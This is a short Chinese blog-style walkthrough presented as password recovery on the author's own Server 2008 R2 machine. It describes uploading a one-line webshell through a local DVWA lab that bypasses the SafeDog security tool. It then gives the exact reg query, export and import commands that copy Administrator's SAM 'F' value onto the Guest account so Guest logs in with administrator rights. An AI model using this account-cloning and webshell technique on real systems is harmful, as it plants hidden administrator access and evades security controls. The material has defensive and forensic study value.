半夜Server 2008R2安裝MS17-010補丁時,重啓系統 發現系統密碼忘記了
還好本地登錄的安全策略留了一個guest用戶
本地搭建了DVWA WEB***測試環境 權限爲system
通過漏洞上傳過狗一句話***
***權限爲system權限
可以創建用戶 但是無法將用戶添加至管理員組 估計是安全狗攔截了提權操作
隨後將管理員權限克隆至login用戶 登錄成功
目標將把Guest提權爲Administrator
查詢SAM註冊表下有什麼配置文件
Reg query HKLM\SAM\SAM\Domains\Account\Users
查詢用戶名
Reg query HKLM\SAM\SAM\Domains\Account\Users\Names
000001F4的配置文件對應的用戶爲Administrator
000001F5的配置文件對應的用戶爲Guest
然後把註冊表下的鍵值導出
先把Administrator的鍵值導出 保存到C盤名稱爲1.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1.reg
再把Guest的鍵值導出 保存到C盤名稱爲2.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F5 c:\2.reg
然後將1.reg “F”的鍵值數據複製下來 替換2.reg裏面的”F”鍵值
然後在把2.reg導入到註冊表
Reg import c:\2.reg
最後使用guest登錄
用戶家目錄等 都變成了Administrator的數據
實際上就是Administrator=Guest